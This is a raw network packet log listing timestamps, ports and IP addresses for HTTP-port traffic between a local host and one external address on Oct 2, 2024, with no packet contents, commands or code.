Oct 2, 2024 09:41:25.362395048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362410069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362422943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362437963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362452030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362467051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362509012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362509012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362509012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362509012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362514973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362529039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362656116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362669945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362684011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362698078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362713099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362726927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362742901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362744093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362744093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362744093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362744093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362756968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362771988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362797976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362797976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362823009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362837076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362849951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362863064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362935066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362948895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362963915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362972021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362972021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362972021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.362981081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.362986088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363020897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363020897 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363073111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363086939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363100052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363107920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363115072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363132954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363148928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363162041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363162041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363162041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363162041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363224983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363239050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363251925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363265991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363280058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363295078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363322020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363322020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363322020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363322020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363379002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363409042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363420010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363434076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363450050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363464117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363476992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363492966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363492966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363493919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363497972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363509893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363512993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363550901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363573074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363612890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363612890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363612890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363643885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363657951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363671064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363739014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363774061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363774061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363774061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363810062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363823891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363837957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363854885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363868952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363882065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363898039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363909006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363909006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363909006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363909006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363944054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363957882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363971949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363987923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.363996029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363996029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.363996029 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364001989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364058018 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364058018 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364073038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364087105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364099979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364113092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364135027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364149094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364177942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364177942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364177942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364177942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364392042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364404917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364419937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364433050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364447117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364461899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364475965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364490032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364490032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364490986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364490986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364490986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364504099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364517927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364532948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364547968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.364554882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364554882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364554882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364554882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364623070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.364623070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.449913979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.449933052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.449947119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.449960947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.449971914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.449984074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.449999094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450009108 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450012922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450026989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450041056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450054884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450067997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450081110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450086117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450086117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450086117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450094938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450119019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450129986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450143099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450158119 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450158119 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450158119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450158119 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450172901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450187922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450202942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450226068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450226068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450226068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450226068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450263977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450277090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450290918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450305939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450320005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450354099 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450354099 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450354099 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450354099 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450373888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450387955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450402021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450417042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450500011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450536013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450536013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450536013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450541973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450546980 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450553894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450581074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450594902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450594902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450633049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450647116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450695038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450695038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450695038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450695038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450730085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450743914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450757980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450805902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450828075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450841904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450854063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450861931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450862885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450862885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450896025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450910091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450922012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450944901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450944901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450946093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450946093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.450954914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450968027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.450980902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451047897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451061010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451072931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451080084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451080084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451080084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451080084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451105118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451118946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451131105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451143980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451184988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451184988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451184988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451184988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451203108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451215982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451230049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451311111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451324940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451340914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451363087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451363087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451363087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451363087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451438904 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451467991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451483011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451495886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451509953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451524019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451538086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451560974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451572895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451579094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451579094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451579094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451579094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451586962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451595068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451622009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451636076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451651096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451678038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451678038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451678038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451678038 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451766014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451780081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451793909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451805115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451805115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451807976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451822996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451837063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451852083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.451884031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451884031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451884031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451924086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.451994896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452008963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452023029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452038050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452052116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452063084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452063084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452065945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452081919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452114105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452114105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452146053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452159882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452173948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452188015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452203989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452215910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452238083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452238083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452238083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452318907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452332973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452347040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452363014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452378035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452392101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452408075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452408075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452408075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452408075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452476978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452497959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452506065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452512026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452527046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452539921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452553988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452568054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452581882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452595949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452604055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452604055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452604055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452604055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452624083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452713013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452727079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452743053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452758074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452764034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452764034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452764034 CEST	49749	80	192.168.2.4	46.8.231.109
